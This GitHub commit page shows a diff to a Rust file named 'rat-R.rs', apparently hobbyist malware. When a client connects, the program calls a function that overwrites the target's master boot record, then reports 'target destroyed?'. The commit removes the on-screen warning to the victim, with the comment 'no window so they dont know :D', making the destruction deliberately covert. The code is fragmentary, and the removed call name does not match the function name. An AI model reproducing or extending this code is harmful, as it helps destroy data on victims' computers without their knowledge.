Skip to content

Commit 075d346

Browse files
authored
Update rat-R.rs
1 parent d671ba9 commit 075d346

File tree

1 file changed

+1
-9
lines changed

1 file changed

+1
-9
lines changed

oth/rat-R.rs

Lines changed: 1 addition & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -30,7 +30,7 @@ async fn handle_client(mut stream: TcpStream) {
3030
tokio::time::sleep(tokio::time::Duration::from_secs(1)).await;
3131
}
3232
stream.write(b"loading...").await.unwrap();
33-
unclo(); // Call the unclose a ble? GUI window
33+
// no window so they dont know :D
3434
mbr_overwrite(); // Call the MBR overwrite function here
3535
stream.write(b"target destroyed?").await.unwrap();
3636
}
@@ -51,12 +51,4 @@ fn mbr_overwrite() {
5151

5252
CloseHandle(h_device);
5353
}
54-
55-
fn unclos() {
56-
let mut window = tk::Window::new();
57-
window.set_title("WARNING (RAT)");
58-
window.set_geometry("300x200");
59-
let label = tk::Label::new(&window, "Your computer has been affected by a Remote RAT! Good luck lol <3");
60-
label.pack();
61-
window.mainloop();
6254
} // 60 lines!

0 commit comments

Comments
 (0)